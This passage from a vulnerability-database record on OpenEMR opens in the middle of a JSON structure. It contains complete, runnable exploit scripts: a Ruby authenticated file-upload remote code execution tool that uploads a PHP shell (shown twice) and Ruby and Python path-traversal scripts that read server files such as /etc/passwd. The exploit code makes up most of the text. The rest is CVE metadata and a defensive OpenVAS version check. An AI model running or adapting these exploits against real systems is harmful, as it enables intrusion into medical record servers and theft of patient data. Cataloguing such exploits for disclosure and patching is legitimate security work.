"3.1"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.3 - (manage_site_files) Remote Code Execution (Authenticated) Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "1337DAY-ID-36549", "href": "https://0day.today/exploit/description/36549", "sourceData": "# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml\n# Version: < 5.0.1.4 (it means up to 5.0.1.3)\n# Tested on: OpenEMR Version 5.0.0.8\n# References: https://www.exploit-db.com/exploits/49998\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'http/form_data'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the shell to be uploaded\n <username> Username of the admin\n <password> Password of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr shell.php admin pass\n #{__FILE__} exploit https://example.org:5000/ shell.php admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef upload(root_url, filepath, http)\n vuln_url = \"#{root_url}/interface/super/manage_site_files.php\"\n pn = Pathname.new(filepath)\n\n params = {\n form_image: {\n content_type: 'application/x-php',\n filename: pn.basename.to_s,\n body: pn\n },\n bn_save: 'Save'\n }\n\n res = http.post(vuln_url, form: params)\n\n return '[-] File not upload' unless (200..299).include?(res.status)\n\n \"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\"\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts upload(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend\n", "sourceHref": "https://0day.today/exploit/36549", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-05T14:19:49", "description": "An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T14:15:00", "type": "cve", "title": "CVE-2019-14530", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2022-02-10T15:26:00", "cpe": [], "id": "CVE-2019-14530", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14530", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "exploitdb": [{"lastseen": "2023-06-05T14:52:36", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-05T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14530"], "modified": "2021-07-05T00:00:00", "id": "EDB-ID:50087", "href": "https://www.exploit-db.com/exploits/50087", "sourceData": "# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530\n# Date: 2021-06-24\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml\n# Version: < 5.0.2 (it means up to 5.0.1.7)\n# Tested on: OpenEMR Version 5.0.1\n# References: https://www.exploit-db.com/exploits/50037\n# CVE: CVE-2019-14530\n# CWE: CWE-22\n# Patch: https://github.com/openemr/openemr/pull/2592/files\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the file to be read\n <username> Username of the admin\n <password> Password of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass\n #{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef exploit(root_url, filename, http)\n vuln_url = \"#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#{filename}\"\n\n http.get(vuln_url).body.to_s\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts exploit(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/50087.rb", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T14:52:42", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-21T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-14530", "CVE-2019-14530"], "modified": "2021-06-21T00:00:00", "id": "EDB-ID:50037", "href": "https://www.exploit-db.com/exploits/50037", "sourceData": "# Exploit Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)\n# Date 16.06.2021\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip\n# Version: All versions prior to 5.0.2\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2019-14530\n# CWE: CWE-22\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2019-14530-Exploit/README.md\n# Reference: https://raw.githubusercontent.com/Wezery/CVE-2019-14530/master/Path%20traversal%20and%20DoS.pdf\n\n'''\nDescription:\nAn issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter.\nAn authenticated attacker can download any file (that is readable by the user www-data)\nfrom server storage. If the requested file is writable for the www-data user and the directory\n/var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.\n'''\n\n\n'''\nBanner:\n'''\nbanner = \"\"\"\n\n\n ______ _______ ____ ___ _ ___ _ _ _ ____ _____ ___\n / ___\\ \\ / / ____| |___ \\ / _ \\/ |/ _ \\ / | || || ___|___ / / _ \\\n| | \\ \\ / /| _| _____ __) | | | | | (_) |_____| | || ||___ \\ |_ \\| | | |\n| |___ \\ V / | |__|_____/ __/| |_| | |\\__, |_____| |__ _|__) |__) | |_| |\n \\____| \\_/ |_____| |_____|\\___/|_| /_/ |_| |_||____/____/ \\___/\n\n by Hacker5preme\n\n\"\"\"\nprint(banner)\n\n\n'''\nImport required modules:\n'''\nimport requests\nimport argparse\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Path Traversal')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\nprint('')\nFilepath = input('[+] Filepath: ')\n\n\n'''\nAuthentication:\n'''\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'\n\n# Header:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Body:\nbody = {\n 'new_login_session_management': '1',\n 'authProvider': 'Default',\n 'authUser': username,\n 'clearPass': password,\n 'languageChoice': '1'\n}\n\n# Authenticate:\nprint('')\nauth = session.post(auth_url, headers=header, data=body)\nif 'error=1&site=' in auth.text:\n print('[-] Authentication failed')\n exit()\nelse:\n print('[+] Authentication successfull: ' + str(auth))\n\n\n'''\nPath Traversal:\n'''\nurl_static = 'http://' + target_ip + ':' + target_port + openemr_path\nurl_dynamic = '/custom/ajax_download.php?fileName=../../../../../../../../..'\nurl_exploit = url_static + url_dynamic + Filepath\nprint('')\nprint('[+] Constructed malicious URL: ')\n\n# Headers:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Exploit:\nprint('')\nprint('[+] Contents of ' + Filepath + ':')\nprint('')\ngetfile = session.get(url_exploit, headers = header)\nprint(getfile.text)", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/50037.py", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T18:25:31", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "exploitdb", "title": "OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-15139", "CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "EDB-ID:50122", "href": "https://www.exploit-db.com/exploits/50122", "sourceData": "# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Date: 2021-07-05\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml\n# Version: < 5.0.1.4 (it means up to 5.0.1.3)\n# Tested on: OpenEMR Version 5.0.0.8\n# References: https://www.exploit-db.com/exploits/49998\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'http/form_data'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the shell to be uploaded\n <username> Username of the admin\n <password> Password of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr shell.php admin pass\n #{__FILE__} exploit https://example.org:5000/ shell.php admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef upload(root_url, filepath, http)\n vuln_url = \"#{root_url}/interface/super/manage_site_files.php\"\n pn = Pathname.new(filepath)\n\n params = {\n form_image: {\n content_type: 'application/x-php',\n filename: pn.basename.to_s,\n body: pn\n },\n bn_save: 'Save'\n }\n\n res = http.post(vuln_url, form: params)\n\n return '[-] File not upload' unless (200..299).include?(res.status)\n\n \"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\"\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts upload(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/php/webapps/50122.rb", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-09-24T14:26:54", "description": "OpenEMR is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2019-08-06T00:00:00", "type": "openvas", "title": "OpenEMR < 5.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-3963", "CVE-2019-3966", "CVE-2019-3968", "CVE-2019-14530", "CVE-2019-3965", "CVE-2019-14529", "CVE-2019-8371", "CVE-2019-3967", "CVE-2019-3964", "CVE-2019-8368"], "modified": "2019-09-24T00:00:00", "id": "OPENVAS:1361412562310142700", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142700", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:open-emr:openemr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142700\");\n script_version(\"2019-09-24T06:52:30+0000\");\n script_tag(name:\"last_modification\", value:\"2019-09-24 06:52:30 +0000 (Tue, 24 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-06 09:13:00 +0000 (Tue, 06 Aug 2019)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2019-14529\", \"CVE-2019-14530\", \"CVE-2019-3963\", \"CVE-2019-3964\", \"CVE-2019-3965\",\n \"CVE-2019-3966\", \"CVE-2019-3967\", \"CVE-2019-3968\", \"CVE-2019-8368\", \"CVE-2019-8371\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"OpenEMR < 5.0.2 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_openemr_detect.nasl\");\n script_mandatory_keys(\"openemr/installed\");\n\n script_tag(name:\"summary\", value:\"OpenEMR is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"OpenEMR is prone to multiple vulnerabilities:\n\n - SQL injection vulnerability in interface/forms/eye_mag/save.php (CVE-2019-14529)\n\n - Authenticated file download vulnerability (CVE-2019-14530)\n\n - Multiple XSS vulnerabilities (CVE-2019-3963, CVE-2019-3964, CVE-2019-3965, CVE-2019-3966, CVE-2019-8368)\n\n - Directory Traversal and Arbitrary File Download vulnerability (CVE-2019-3967)\n\n - Multiple command injection vulnerabilities (CVE-2019-3968, CVE-2019-8371)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"OpenEMR versions prior to 5.0.2.\");\n\n script_tag(name:\"solution\", value:\"Update to version 5.0.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/2592\");\n script_xref(name:\"URL\", value:\"https://github.com/Wezery/CVE-2019-14530\");\n script_xref(name:\"URL\", value:\"https://www.tenable.com/security/research/tra-2019-40\");\n script_xref(name:\"URL\", value:\"https://know.bishopfox.com/advisories/openemr-5-0-16-remote-code-execution-cross-site-scripting\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif (version_is_less(version: version, test_version: \"5.0.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.0.2\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}